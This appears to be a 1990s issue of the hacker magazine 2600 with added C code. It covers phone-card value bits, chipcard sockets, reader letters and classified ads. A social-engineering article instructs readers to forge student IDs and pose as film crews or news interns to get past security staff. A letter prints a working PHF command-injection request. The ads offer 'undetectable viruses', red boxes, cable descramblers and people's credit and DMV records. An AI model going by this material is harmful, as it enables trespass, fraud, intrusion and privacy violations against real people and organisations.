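   64-95 are four 8-bit value stages, a set bit in stage k being worth 8^k
   units; bits 96-103 are WORM bits. 104 bits in all, i.e. bytes $00-$0C. */
#define TOTAL_BITS 104
#define ID_BITS    64
#define STAGES     4

typedef struct {
    uint8_t id[ID_BITS / 8];   /* stream bit 0 is the MSB of id[0] */
    uint8_t stage[STAGES];     /* stage[k]: each 1 bit = 8^k units */
    uint8_t worm;              /* bits 96-103 */
} card_t;

/* Parse a captured stream such as "1010...": exactly 104 '0'/'1' chars,
   bit 0 first. Returns 0 on success, -1 on a length or character error,
   -2 if bit 0 is not 1 (the chip powers up at bit 0, which is always 1). */
int parse_stream(const char *bits, card_t *c) {
    if (strlen(bits) != TOTAL_BITS) return -1;
    memset(c, 0, sizeof *c);
    for (int i = 0; i < TOTAL_BITS; i++) {
        if (bits[i] != '0' && bits[i] != '1') return -1;
        if (bits[i] == '0') continue;
        uint8_t m = (uint8_t)(0x80u >> (i % 8));
        if (i < ID_BITS)                   c->id[i / 8] |= m;
        else if (i < ID_BITS + 8 * STAGES) c->stage[(i - ID_BITS) / 8] |= m;
        else                               c->worm |= m;
    }
    return (c->id[0] & 0x80) ? 0 : -2;
}

static int popcount8(uint8_t b) { int n = 0; for (; b; b >>= 1) n += b & 1; return n; }
static int any_set_bit(uint8_t b) { for (int i = 0; i < 8; i++) if (b & (1u << i)) return i; return -1; }

/* Units left on the card: the 1 bits in each stage times that stage's weight. */
unsigned card_value(const card_t *c) {
    unsigned total = 0, weight = 1;
    for (int k = 0; k < STAGES; k++, weight *= 8) total += popcount8(c->stage[k]) * weight;
    return total;
}

/* A write can only clear a bit ("only the VALUE and WORM bits can be set
   to zero"). Clearing a bit worth 8 units or more triggers the erase
   function, which sets all eight bits of the next lower stage to 1.
   Returns 0 on success, -1 if the bit is out of range or already 0. */
int write_bit_zero(card_t *c, int k, int bit) {
    if (k < 0 || k >= STAGES || bit < 0 || bit > 7) return -1;
    uint8_t m = (uint8_t)(1u << bit);
    if (!(c->stage[k] & m)) return -1;
    c->stage[k] &= (uint8_t)~m;
    if (k > 0) c->stage[k - 1] = 0xFF;
    return 0;
}

/* Debit one unit: if the 1-unit stage is empty, clear a bit in the lowest
   non-empty stage and let the erase function refill the stages below it,
   then take one unit. Returns 0 on success, -1 if the card is empty. */
int debit_one(card_t *c) {
    int k = 0;
    while (k < STAGES && c->stage[k] == 0) k++;
    if (k == STAGES) return -1;
    for (int j = k; j > 0; j--)
        write_bit_zero(c, j, any_set_bit(c->stage[j]));  /* refills stage j-1 */
    return write_bit_zero(c, 0, any_set_bit(c->stage[0]));
}

/* Constructed sample stream (not a real capture): ID starting with a 1 bit,
   stages 0 and 1 empty, one 64-unit bit in stage 2, stage 3 empty, WORM all 1. */
int build_sample(card_t *c) {
    char s[TOTAL_BITS + 1];
    memset(s, '0', TOTAL_BITS);
    s[TOTAL_BITS] = '\0';
    s[0] = '1';
    memcpy(s + 80, "00000001", 8);   /* stage 2 */
    memcpy(s + 96, "11111111", 8);   /* WORM bits */
    return parse_stream(s, c);
}

int main(void) {
    card_t c;
    if (build_sample(&c) != 0) return 1;
    printf("before: %u units\n", card_value(&c));
    debit_one(&c);
    printf("after one debit: %u units, stages %02X %02X %02X %02X\n",
           card_value(&c), c.stage[0], c.stage[1], c.stage[2], c.stage[3]);
    return 0;
}
```

Running it shows 64 units before and 63 after one debit, with stages 0 and 1 each left holding seven ones: clearing the 64-unit bit costs nothing net until a unit is taken from the refilled lower stage. Note that debit_one() never sets a bit except through the erase side effect, which is the constraint that stops a card from being recharged by rewriting its value bits.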


Chipcard Socket Review 
I have looked at several different chipcard 
sockets. Some are really good and inexpensive 
and some are unmentionably bad! ITT Cannon,
Amphenol, and Alcatel all make very inexpen-
sive “consumer” grade card sockets. All these
makes come in both the “scratch the card” ($5
or less) variety and the more expensive (around
$15) less scratching types. All supply both ISO
position or ISO and AFNOR 16 pin sockets at
slightly higher cost of course.

The above manufacturers also make con- 
sumer grade “less scratching” types where the 
contacts lower onto the card and only make 
slight scratches. A further improvement gets 
devices that lower the contacts directly on the 
module after insertion and take it up at the least 
tug of removing the card. 

In addition to the above makers, these 
midrange “commercial grade” sockets are 
made by Omron, ddm hopt+schuler, and Connec-
tral. The “ddm” device is the superior choice
with the Omron SCROJ-002 coming in second 
place with the others about the same. All are 
less than $60 list price. 

If you must hold the card, try an Omron 
3S4YR-SFROJ. It contains a microswitch that 
detects card entry, a card holding device 
(stronger than the card!) and a microswitch to 
indicate a locked down card. Red and green 
LED’s are provided for the user’s comfort and 
convenience and are obviously useful! List 
price is about $150. 

The “scratching” type is out of the question 
for any use that involves inserting and remov- 
ing a card repeatedly (estimated module life: 
from 10-100 times for the cheap (phone) cards 
and perhaps 10 times that for the smartcards 
with thicker gold plating). Their intended use is 
similar to an IC socket (they all are IC sockets) 
where a card would be left in place for some 
time, say in a GSM or pay TV decoder. If you
want to hobby with these, you’ll waste a lot of 
cards! 

That is basically what is out there for the 
hobbyist. I didn’t go into the hyper expensive 
units that “swallow” the card as they are proba- 
bly not interesting to the hobbyist. There are 
many manufacturers of these specialized units. 
SOCIAL [...] WAY


by Bernz 

We live in a world where video and film 
cameras create a certain attitude. Watch the 
news one day. A camera and a reporter shoot 
a story. Every time a pedestrian walks by, 
they turn to the camera, make a stupid face, 
and grin. They are happy for those three sec- 
onds of background exposure. To me, this is 
an idiotic attitude, but it also represents a 
tear that can be converted into a chasm of a 
security hole. 

If someone told you sincerely, “I’m 
gonna put you in a movie”, you'd be happy. 
You'd get your big dose of mass communica- 
tion fame and fortune. Actually, we probably 
would think he’s an undercover cop and 
move out of state. But we’re a weird bunch 
and we can’t assume everyone’s a paranoid 
little fuck. 

What this brings me to is that almost 
everyone in the world loves the camera. This 
is a security flaw, believe it or not, that can 
be exploited to a great degree. 


What do you need? 

First things first. You need a camera. I 
would prefer Hi-8, but an old 8mm would do 
just fine. It must have sound and a relatively 
clear picture. Lots of videotape and batteries 
are good. You’ll also want a boom mike and 
a friend to carry it for you. Like all social en- 
gineering, professional appearance is what 
matters most of all. 

Next, you need credentials. You can’t just 
walk into your mark’s office and say “I’m 
gonna take video.” The fact that you have a 
camera and a sound guy is great and lends 
quite a bit to your appearance, but you need 
an edge. Hence, the film student. Almost 
every state has a college with film students in 
it. Finger accounts at these colleges. A great
majority of colleges use Student ID numbers
for logins. Use a desktop publisher and whip
up some fake IDs on card stock. If you can’t
do this on your own, someday I’ll get off my
ass and make templates. Make sure the
names correspond to your sex. If you’ve got
a beard and your “name” is Jennifer, I don’t
think you’ll be taken seriously.


Entrance 

You have your alibi for your appearance 
and your equipment. Go to the front office 
and talk to whoever it is that lets you in. Point 
the camera at the security guy. Tell him you’re
film students or even better, news interns,
shooting documentary footage on local (fill in 
company or governmental position here). Se- 
curity guards are not noted for their intelli- 
gence, nor are they noted for good pay and 
fun lives. Any chance to be on American or 
even (name a county here) television will 
make them cooperative. They’ll probably give 
you clearance if they can. If you have to keep 
up subterfuge to get in, do it. I can’t instruct 
you on that as it differs from case to case. 

A boss might have to confirm this. Even 
if it is a government place, chances are it’s a 
Dilbert-esque environment. The bosses are 
moronic and the workers are dim and with- 
out energy. The boss will let you in to pro- 
mote his office (and himself). Anyone in any 
corporate structure desires to advance much 
further. A good report on local news can def- 
initely help that out. That one-eyed god on 
your shoulder can enlighten any environ- 
ment though. Cameras bring an odd sense of 
wonderment to those being filmed. 

If you’re going to use the news scam, 
wear your fake IDs on the outside, like a real 
press person. 


(continued on page 26) 
(continued from page 39)


A Freer JUNO 


Dear 2600: 

If you’re like any normal person who uses JUNO
(the free email service), you are probably annoyed at
those stupid ads that fly across your screen. Well I
know I was pissed so I did something about it. All you
have to do is go to your painting program and open up
the .BMP files that are located in your JUNO\ADS sec-
tion or wherever you installed JUNO. Change them
however you want to. Then choose the save option. Be-
cause the ads flash across your screen it had to be con-
figured to move, write, and whatever bull they make it
do. When you change it, it can no longer work. You can
also edit the read and write buttons to create a small two
picture movie. My JUNO looks totally different than it
did when I first got it. I admit this isn’t a truly significant
find or a noteworthy hack, but I’m a little happier now
that I can send email in peace.

phunhertz


Cable Notes 


Dear 2600:

In the last issue of 2600, I read Active Matrix’s arti-
cle on the CFT2200 converter box by General Instru-
ment. Matrix seemed concerned about the apparent lack
of privacy by it being a two-way converter. Rest assured,
Big Brother is not watching you. The CFT2200 is able
to send low bandwidth return packet data to the main
control computer. This computer stores cable account
information about the customer, and current channel au-
thorizations. When you hit the buy button to order pay
per view, the box sends a request to the control com-
puter, which in turn queries the request, and soon autho-
rizes that channel and adds that to your bill.

The control computer is incapable of storing large
records on customers anyway, being that the typical
plant serves 200,000 to 300,000 customers and the
server is equipped with only five to six gigs of HD space.

I hope I was of help. I don’t know what Starview is
either.

Platypus Man


Gambling Hack 


Dear 2600: 

I read the article on casino hacking and I need to 
know if this person (or you or anyone you know) can 
help me locate any of the slot detectors or slot manipu- 
lators that are currently available. The slot detectors 
function by allowing the user to know when a slot ma- 
chine is in a payout cycle. The older ones used to click 
like a geiger counter but the new ones vibrate like a 
pager. When the slot machine goes into another cycle
the detector slows down or completely stops vibrating,
signaling the user to move onto another machine in the 
payout cycle. 

The slot manipulators function by allowing the user 
to pause the R.N.G. in the keno machines to repeat the 
same numbers, or the cards in the poker machines to re- 
peat in the double down mode. It was explained to me 
that this is similar to using the pause button on the VCR 
along with a frequency lock. 

I’ve seen both the slot detectors and manipulators 
used but can’t find out where to purchase them. Both are 
easily concealable and are undetectable electronically. 
I'd appreciate any and all help locating them. 

Guz 

When you find them, we expect you'll lead an excit-
ing life.


PHF Exploit


Dear 2600: 

I was reading your Autumn 1996 issue and was 
wondering where fencer had to reach to pull out his arti- 
cle on “The PHF Exploit”. 

Let me attempt to correct some of the errors in the 
article. First of all, phf is a C program, and so is not and 
was not distributed in executable form in the cgi-bin di- 
rectory by NCSA httpd and Apache httpd. It is true, 
however, that many webmasters have blindly compiled 
and installed all the sample cgi programs distributed 
with NCSA or Apache httpd. 

Second: the author is completely mistaken about 
the purpose of phf. Phf is a web interface to the “ph” 
program, which is a client for the CCSO qi phonebook 
nameserver. This phonebook system is in place at 
around 300 universities around the world, and not many 
other places, which points out how little thought most 
webmasters put into the security risks they are accepting 
on their systems (they probably don’t have the “ph” pro- 
gram on their system, much less a phonebook to talk to, 
so what exactly is the point of installing phf?). 

Phf calls “ph” via popen() with user-supplied input 
(but all shell meta-characters except the newline charac- 
ter were escaped prior to the popen() call), and hence 
the entry point for the exploit. Fencer describes his ex- 
ploit but completely misses this point, which is at the 
heart of the exploit. 

For example, in the exploit (trimmed to the bare 
minimum of fluff you need to get it to work): 

echo "GET /cgi-bin/phf?Q=%0Atouch%20/tmp/sucker" | nc www.sucker.com 80

“%0A” is translated to the newline character by phf 
(and “%20” to a space), and so, not only does the “ph” 
get executed when popen() is called, but so does the 
command “touch /tmp/sucker”. 

I’m really impressed that despite no apparent knowl- 
edge of phf or how the exploit works, that fencer was 
clever enough to figure out that he could put any com- 
mand in the place where his exploit had “/bin/cat”. Wow. 
Third: what fencer calls the “Q commands” in his
exploit example, which he claims are required to be in- 
cluded in an exploit, are not required, save one. If he had 
read the source code to phf, or even if he had tried not 
including them as a test, he would discover that he could 
get by without providing all those fields in his exploit. 

Fourth: when telnetting to port 80 you don’t have to hit 
enter twice if you provide a query lacking the string 
“HTTP/1.0” at the end (indicating to the server that you are 
speaking the pre-HTTP/1.0 protocol which doesn’t send 
any HTTP request headers). You have to hit enter twice 
when providing an HTTP/1.0 query, because the server is 
otherwise in a state where it is expecting HTTP headers 
from you, until you end your query with a blank line. 

Doesn’t anyone review these articles before they go 
to press? 

Astraea 

Here is the author's reply:

I am sorry you found such fault with the article. To 
address your concerns: several flavors of Apache and 
NCSA were distributed with the cgi-bin compile option 
open and when compiled as per their instructions and 
installed as per the general installation were in fact in- 
stalled. Both NCSA and Apache advised users that this
situation existed and that it was a screw-up. This is
clearly mentioned in the Apache Weekly Newsletter
(issue 34).

What they say is that if you install, you get the phf 
cgi as well as the others in the ./cgi-bin directory with- 
out it telling you that it did that. That was a screw-up, 
and an admitted one and they tried to warn people that 
this was indeed a problem. They also state, clearly, that 
if you get version 1.0.5 and above, it is no longer a prob- 
lem. This point has been driven home again and again 
on the Usenet apache news group and on their website. 
It was an oversight that Apache wasn't alone in making.
NCSA released two distros that did this as well, and the
version of phf they distrod was vulnerable to this 
“hack”. 

I called phf a cgi binary. That's what it is. I am not 
disputing the language it was written in. That doesn't 
pertain to this in any event. The purpose of phf may in- 
deed have been what you described, but it has in the 
past year featured heavily in mainstream articles as a 
tool to present files and information without the expen- 
sive SQL front ends - put simply, several articles detail- 
ing how to present database output using it. I am not 
excusing this use; I am simply saying that this is the 
modern use of the cgi. Some versions of phf require all 
of the fields, some don't. I thought that it was clear in 
the article. There is no harm in including them. I'm 
sorry if you misunderstood my intent. 

Fencer 
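
Putting the point of the two letters above into code: the program below is an added example, not the NCSA phf source and not anything from either letter. It decodes a query string, escapes it with a blacklist of shell metacharacters the way phf did, and reports whether /bin/sh would still see a second command. The two blacklists are illustrative (the first lacks the newline, the second adds it); the exact list from util.c is not reproduced on this page. run_ph_noshell() shows the fix that does not depend on a blacklist at all: the decoded query becomes one argv element of execlp(), so no shell ever parses it. It assumes a ph binary on PATH and main() does not call it; nothing in the program executes a command.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

/* Decode %XX escapes the way a CGI query string is decoded: "%0A" becomes
   a real newline, "%20" a space, "+" a space. `out` needs strlen(in)+1 bytes. */
static int hexval(int c) {
    if (isdigit(c)) return c - '0';
    c = tolower(c);
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

void url_decode(const char *in, char *out) {
    while (*in) {
        if (*in == '%' && hexval((unsigned char)in[1]) >= 0 && hexval((unsigned char)in[2]) >= 0) {
            *out++ = (char)(hexval((unsigned char)in[1]) * 16 + hexval((unsigned char)in[2]));
            in += 3;
        } else if (*in == '+') {
            *out++ = ' ';
            in++;
        } else {
            *out++ = *in++;
        }
    }
    *out = '\0';
}

/* Put a backslash in front of every byte listed in `bad`. `out` needs
   2*strlen(in)+1 bytes. This is the blacklist approach phf relied on. */
void escape_shell(const char *in, const char *bad, char *out) {
    for (; *in; in++) {
        if (strchr(bad, (unsigned char)*in)) *out++ = '\\';
        *out++ = *in;
    }
    *out = '\0';
}

/* Illustrative blacklist that covers the usual metacharacters but not '\n':
   the newline still ends the command for /bin/sh. */
const char *BAD_NO_NEWLINE = "&;`'\"|*?~<>^()[]{}$\\";
/* Same list with '\n' added: backslash-newline is a line continuation,
   so the decoded %0A can no longer start a second command. */
const char *BAD_WITH_NEWLINE = "&;`'\"|*?~<>^()[]{}$\\\n";

/* Build the string a phf-style CGI would hand to popen(): "ph " plus the
   decoded, escaped query. Nothing is executed here. */
void build_ph_command(const char *raw_query, const char *bad, char *cmd, size_t cmdsz) {
    char decoded[256], escaped[512];
    if (strlen(raw_query) >= sizeof decoded) { cmd[0] = '\0'; return; }
    url_decode(raw_query, decoded);
    escape_shell(decoded, bad, escaped);
    snprintf(cmd, cmdsz, "ph %s", escaped);
}

/* A newline not preceded by a backslash means /bin/sh will run whatever
   follows it as a separate command. */
int has_unescaped_newline(const char *cmd) {
    for (const char *p = cmd; *p; p++)
        if (*p == '\n' && (p == cmd || p[-1] != '\\')) return 1;
    return 0;
}

/* 1 if `raw_query` would inject a second command through the given blacklist. */
int query_is_injectable(const char *raw_query, const char *bad) {
    char cmd[1024];
    build_ph_command(raw_query, bad, cmd, sizeof cmd);
    return has_unescaped_newline(cmd);
}

/* Hardened form: no shell at all. The decoded query is one argv element of
   execlp(), so no byte in it can become a command separator. Assumes a `ph`
   binary on PATH. Returns the child's exit status, or -1 on failure. */
int run_ph_noshell(const char *decoded_query) {
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execlp("ph", "ph", decoded_query, (char *)NULL);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    const char *q = "%0Atouch%20/tmp/sucker";   /* the query from the letter above */
    printf("blacklist without newline: injectable=%d\n", query_is_injectable(q, BAD_NO_NEWLINE));
    printf("blacklist with newline:    injectable=%d\n", query_is_injectable(q, BAD_WITH_NEWLINE));
    return 0;
}
```

With the newline-free blacklist the built command is "ph " followed by a raw newline and then touch /tmp/sucker, which the shell runs as two commands; with '\n' on the list the newline is preceded by a backslash and becomes a line continuation, so ph merely receives an odd argument. Escaping is the weaker of the two fixes: the argv approach holds even when the next forgotten byte is something other than a newline.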


Monopolistic Motion 


Dear 2600: 
By the time this letter is seen, my local ISP will be 
down. It’s a relatively small BBS in Nashville, TN called
Sounds of Silence. It gets its phone lines from Bell 
South. Bell South, along with local government, has 
taken some actions that are producing hard times for all 
local ISP’s. Bell South’s part in this is that they’re start- 
ing their own ISP and trying to force the competition 
out. There is nothing that can stop them, because some- 
one found a loophole in a tax law here and is forcing an 
entertainment/sales tax on all services provided. At first, 
they said that they would start collecting on the tax this 
year. Now they say that the tax should have been col- 
lected since 1993, and have made the tax retroactive. All 
local ISPs must pay these back taxes. You can imagine 
how much it will cost. As of now, this system is going 
down on the ninth of November, and other systems are 
starting to feel the pressure from Bell South and the lo- 
cal government. 
(orbital)

This is exactly the kind of thing a lot of us worried
about when the phone companies started to show an in-
terest in the net. Don't think that you're powerless here -
getting the word out will definitely make a difference. 
People have seen the power of the net and they won't be 
very eager to hand it over to a corporate monopoly. 


A Fun Federal Story 


Dear 2600: 

I am writing this letter in reference to “And Justice 
For All”. To make a long story short.... 

My dad is a real estate appraiser in Montana. My 
dad works with another man in the same business. Pres- 
ident Clinton was on vacation in Jackson Hole, 
Wyoming. The man who works with my dad had to go 
to Jackson Hole to do an appraisal. When he got there, 
he went to the courthouse to do some work and found a 
party going on. He asked what was going on and they
told him the following story: 

A man had flown into the Jackson Hole airport, 
someone who lived in the area. He went to the parking 
lot, got in his jeep, and started to drive home. He hap- 
pened to drive past some FBI agents who were prowling 
the neighborhood. He had a bumper sticker that said 
“Clinton Gone in Four”. The FBI saw this and pulled 
him over. They manhandle him out of his jeep and tell 
him to remove the bumper sticker. The man refused 
based on the belief that this is a free country. They pro- 
ceed to frisk him and basically beat the shit out of him. 
A Jackson Hole sheriff’s deputy came along at this point 
and asked what the trouble was. The FBI told him the 
man wouldn’t remove the bumper sticker. The sheriff’s 
deputy said the man in the jeep had the right to say what 
he wanted to. The FBI agents said no. At this point the 
sheriff’s deputy pulled his gun and put it to the head of 
one of the FBI agents and said “Let him go.” They did. 
The sheriff’s deputy told the FBI to go fuck themselves. 
He was not afraid of the big bad feds. He was a hero in 
Jackson Hole and that’s why the party was taking place. 
There never was a report filed. But it happened and the 
feds lost. Clinton left and things went back to normal. 
The FBI went home with their tail between their legs. 
Too bad. 
love 357 
A very interesting story but we have one observa- 
tion. The tactics and behavior you refer to sound very 
much like the Secret Service. Is it possible these were the 
people in Jackson Hole that day? 


Disturbing News 


Dear 2600: 

Please find the enclosed mailing I received from the 
USPS. This was triggered when I closed my P.O. box 
and filed a change of address. What are they doing send- 
ing me a letter to remind the IRS of my new address? 
This letter is dated ten days after filing the COA. The 
most disturbing thing is the use of a pre-printed and 
postage paid envelope. I would like to know if any other 
readers have had a similar experience. 

Rich D. 

We agree this is a troubling and ominous form to re- 
ceive. The IRS and the post office seem to have become 
real good friends. 


Porn Sting Update 


Dear 2600: 

I came across some more information about the 
porn sting in Colorado that you might find interesting. 
The (303) 293-2953 number printed is now “discon- 
nected or no longer in service” when one calls. This 
happened just after 2600 hit the stands. Hopefully, F’s 
letter had an impact. However, the porn sting contin- 
ues... there are four other phone numbers using the same 
Audix system: (303) 637-6391 for S&M, 6392 for 
young boys, 6393 for young girls, 6394 for animals. 

Also, the mail drop for this sting is P.O. Box 
300464, Denver, CO 80203-0464, which happens to be 
a major postal facility and two blocks from the postal 
inspector’s office. 

They are also trying to entrap people into physical 
meetings where they are then arrested. For instance, let- 
ters came from a guy named Kreeger (a fake Arvada po- 
lice name) trying to set up sex liaisons for cash. He wrote 
from an address on West 58th Place in Arvada with 
apartment 311E. A few of us investigated that address. 
It’s an apartment building but there is no apartment 
311E. However, there is a mail drop off for them. Simply 
put, they are trying to entrap people for solicitation. 

I am interested if there are any more stories about 
this sting and any others. Thanks to your magazine, we 
can read about what the government is trying to do. 

BD 
Denver 

If this does turn out to be a sting, it has to be one of 
the most ill-conceived and clumsily run ones that we've 
ever seen. The only thing more embarrassing than run- 
ning such a circus would be to get busted by it. 


NYNEX Neighbor Problems 


Dear 2600: 

I have been a reader of your magazine for a year. 
Your magazine is read by a lot of people and I really en- 
joy it. I am not a member for fear of being placed on a 
government list of potential troublemakers that was 
started up again after the Oklahoma bombing. 

The reason I am writing to you is because I have a 
neighbor who has worked for NYNEX telephone repair 
for a long time. This person knows all the angles. My 
telephone service is obsolete in my view because I was 
told by a sympathetic NYNEX employee that she was 
recording all conversations as well as all numbers going 
into and out of my phone line. She has deleted messages 
on my pagers and called potential employers and told 
them I was not looking for work or that I and my family 
members were incompetent. She has my neighborhood 
on her side since we are quiet people and they have not 
heard our side to realize that she loves to cause trouble. 
This is why she was forced to move from her last loca- 
tion. I know where she works out of but am not really 
sure what I can do. Strange events are also happening to 
anyone who has called my home or people who have 
been called by me in the last year. I have called the 
NYNEX operators, the police, and received no re- 
sponse. I have also received an “I’m not sure” from the 
Attorney General’s office. As of now I do not have any 
phone service or beeper service. If you could please ask 
your readers for any options I may have, I would be for- 
ever indebted to you. 

Guard of the Gate 
Somewhere in MA 

It's hard to believe that a “sympathetic” NYNEX 
employee would tell you that another NYNEX employee 
was recording your conversations and then do nothing 
about it. In all likelihood the two of them had a good 
laugh about it afterwards. While a corrupt telco em- 
ployee can indeed cause havoc in your life, they will 
eventually slip up in some way and be detected. The im- 
portant thing is not to make yourself the object of atten- 
tion when you call to investigate these matters. If your 
claims seem too wild or you appear too desperate, 
you'll be dismissed as a nut. Hard as it may be, you 
need to be patient with the people you talk with so that 
you have a fair chance of getting them on your side. 
Once your claims are taken seriously, these people 
should work with you to find the answer, which may or 
may not be what you already suspect. In all likelihood, 
this neighbor of yours is playing mind games to make 
you think she's capable of doing anything. The way to 
win is not to play. 


letters@2600.com


Happenings


BEYOND HOPE. It’s the long-awaited sequel to 
Hackers On Planet Earth and it takes place next 
summer in New York City! Location and regis- 
tration info will be announced soon. Contact our 
voice BBS for more info: (516) 473-2626 or 
email: beyondhope@2600.com or check our web 
site: www.2600.com. 


For Sale


“LINUX95: The Choice of a GNU Genera- 
tion” bumper stickers! Don’t be caught without 
one. $1 each (postpaid) US cash or postal money 
order. Design Science Labs, PO Box 542, Berea, 
OH 44017-0542. 

INFORMATION IS POWER! Our catalog is 
available with informational manuals, programs, 
files, books, and video. Get the information from 
the experts in hacking, phreaking, cracking, elec- 
tronics, viruses, anarchy techniques, and the in- 
ternet here. Legit and recognized world-wide, 
our information will elevate you to a higher 
plane of consciousness. Join Today! Send $1 for 
our Catalog to: SotMESC, Box 573, Long Beach, 
MS 39560. 

TAP BACK ISSUES, complete set. Vol. 1-91 of 
QUALITY copies from originals. Includes sche- 
matics and indexes. $100 postpaid. Via UPS or 
first class mail. Copy of 1971 Esquire article 
“The Secrets of the Little Blue Box” $5 & large 
SASE w/52 cents of stamps. Pete G., PO Box 
463, Mt. Laurel, NJ 08054. We are the original! 
FREE CABLE TV: Cable TV boxes enable you 
to receive “every pay channel” for FREE as well 
as pay-per-view. Stop paying outrageous fees for 
pay channels. Box cannot be bulleted! You must 
call or email first and tell us the brand and model 
number of the cable box you have. Example: Jer- 
told DPVSXXX. Only $199 U.S. & $15 shipping 
& handling. Our units work with Jerrold, Pio- 
neer, and Scientific Atlanta boxes only! 30 day 
money back guarantee on cable boxes! FREE 
PHONE CALLS FOR LIFE! New video “How 
To Build a Red Box”. VHS 60 min. Complete 
step by step instructions on how to convert a Ra- 
dio Shack tone dialer (model 43-146) into a red 
box to obtain FREE calls from payphones. This 
video makes it easy. Magnification of circuit 
board gives a great detailed view of process. 
Other red boxing devices discussed as well: Hall- 
mark cards, digital recording watch, and more! 
This video will save you thousands of dollars 
every year. Best investment you'll ever make! 
New Year’s Sale price $9 US & $5 for shipping & 
handling. We sell 6.50 MHz crystals and UZI 
boxes too! COD available or send check or 
money order to: East America Company, Suite 
300H, 156 Sherwood Place, Englewood, NJ 
07631-3611. Tel: (201) 343-7017. Email: 
76501.3071@compuserve.com. Free technical support! 
Mail order only! 

6.5536 MHZ CRYSTALS available in these 
quantities ONLY: 5 for $20, 10 for only $35, 25 
for $75, 50 for $125, 100 for $220, 200 for only 
$400 ($2 each). Crystals are POSTPAID. All or- 
ders from outside U.S. add $12 per order in U.S. 
funds. For other quantities, include phone num- 
ber and needs. E. Newman, 215-40 23rd Road, 
Bayside, NY 11360. 

NEW VERSION DSS TEST CARDS and re- 
programmed plastic access cards. Also cable TV 
replacement one piece converters in full test 
mode for all cable systems (I need to know the 
converter brand name and model number from 
the bottom of the converter). Ray Burgess, PO 
Box 99B65086, Pontiac, IL 61764-0099. 
UNDETECTABLE VIRUSES. Offering five 
viruses/viri which can automatically knock down 
DOS and Windows (3.1) operating systems at the 
victim’s command to open Windows. Easily 
loaded, recurrently destructive, and undetectable 
via all virus detection and cleaning programs 
with which I am familiar. Well-tested, relatively 
simple, and designed with stealth and victim be- 
havior in mind. Well-written documentation and 
antidote programs are included. Reasonably 
priced - $10 even for TWO sets. They make great 
gifts! Money orders and checks preferred. Pro- 
vided on seven 1.44 MB, 3.5” floppy disks which 
can be freely copied. Mailed “priority” (USPO) 
along with instructions. Sorry, no foreign orders 
accepted. Satisfaction guaranteed or you have a 
bad attitude! The Omega Man, 8102 Furness 
Cove, Austin, TX 78753. 

CAP’N CRUNCH WHISTLES. Brand new, 
only a few left. THE ORIGINAL WHISTLE in 
mint condition, never used. Join the elite few 
who own this treasure! Once they are gone, that 
is it - there are no more! Keychain hole for 
keyring. Identify yourself at meetings, etc. as a 
2600 member by dangling your keychain and 
saying nothing. Cover one hole and get exactly 
2600 hz, cover the other hole and get another fre- 
quency. Use both holes to call your dog or dol- 
phin. Also, ideal for telephone remote control 
devices. Price includes mailing. $99.95. Not only 
a collector’s item but a VERY USEFUL device to 
carry at all times. Cash or money order only. 
Mail to: WHISTLE, P.O. Box 11562-ST, Clt, 
Missouri 63105. 

CREDIT CARD READER/WRITER that you 
can build at home. Interfaces with a home com- 
puter. For complete schematics and instructions 
send a check or m/o for $10 and a SASE to PBA 
Enterprises, P.O. Box 14257, Minneapolis, MN 
55414. 

DISAPPEARING INK formulas! Safely write 
the ultimate love letter or nasty note! Great gag 
item. Signed documents and memos will com- 
pletely and undetectably disappear in 1 day to 4 
weeks. Deterioration rate can be regulated. $5 
postpaid. Pete Haas, PO Box 702, Kent, Ohio 
44240-0013. 


Services


COMPUTER CRIME DEFENSE ATTOR- 
NEY: CIS degree with 10 years computer expe- 
rience. Dorsey Morrow, Jr. Contact at (334) 
265-6602 or visit www.cyhawk.com/cyberlaw. 

DATA INTELLIGENCE CORE. Providing 
FOIA documents and other related intelligence 
material to people. We can acquire contact infor- 
mation on a particular agency/supply you with 
research material, and look up online services to 
find people, look up people’s credit records, 
DMV records, etc. P.O. Box 23282, Tigard, OR 
97281. (503) 697-1031. Fax: (503) 636-6394. 
BUY, SELL, TRADE PUBLIC RECORDS! 
We buy, sell, and trade public records. Please call 
us at (916) 443-4822 or fax (916) 443-7420. We 
currently have many states' records, mostly west 
coast, corporate/LTD's, real estate, criminal and 
civil, fictitious business filings, resale permits, 
marriage, divorce, DMV, vehicles. 


Help Wanted


NEED HELP TO CLEAR CREDIT. Please re- 
spond to B. Rice, Box 721, Annapolis, MD 21404. 


Bulletin Boards


ANARCHY ONLINE. A computer bulletin 
board resource for anarchists, survivalists, ad- 
venturers, investigators, researchers, computer 
hackers, and phone phreaks. Scheduled hacker 
chat meetings. Encrypted e-mail/file exchange. 
WWW - http://anarchy-online.com. Telnet: anar- 
chy-online.com. Modem: (214) 289-8328. 
FLUID BBS is a bulletin board system created 
for conversation. One line. Call and post mes- 
sages, download QWK packets, etc. No files, no 
doors (olg’s) and no stupid renegade mods. A 
simple board that you call up to talk to each other 
and log off. HPAVC related, somewhat. (303) 
460-9632. 


THE ANSWER IS NO! You CANNOT take 
out a classified ad in 2600 if you don’t sub- 
scribe! You cannot pay us any amount of 
money to advertise either here or elsewhere in 
the magazine. So please don’t ask - you proba- 
bly won’t even get a reply. If you do subscribe, 
you are entitled to a free ad in the Market- 
place as space and standards permit. Send 
your ad to: 2600 Marketplace, PO Box 99, 
Middle Island, NY 11953. Include your ad- 
dress label or photocopy. Deadline for Spring 
issue: 2/15/97. 
by rdpzza

While many may consider this a trivial exercise, cracking the password scheme for Win95 may be useful to some of you out there. Some may even find ways to have phun with it as well.

To start with, you need to know where to look. In 3.1, the password was kept in the control.ini. Although 95 also uses the control.ini, it does not use it for keeping the password information. For 95, you will have to look in each of the user.dat files. I say each because if you have multiple users, each user may have a profile saved on the hard drive. The default user.dat file is in the \windows directory. The other user.dat files can be found in the directory \profiles\username where username changes. As you may know, user.dat is one of the two files used for the registry and it is very important. User.dat will carry the attributes “shr” so you will have to look accordingly. Also, since it is so important, a backup of user.dat is kept, namely user.da0. This may be the previous user.dat, say when the user changed passwords...

Anyway, now that you have the file, where is it? If you scan the file for password, you will come up with the setting of whether or not the screen saver is password protected. This may be enough for you so you can just change it and be done. While this little change will be noticed, it will get you by the password. If, however, you wish to actually find out what the pass phrase is, read on.

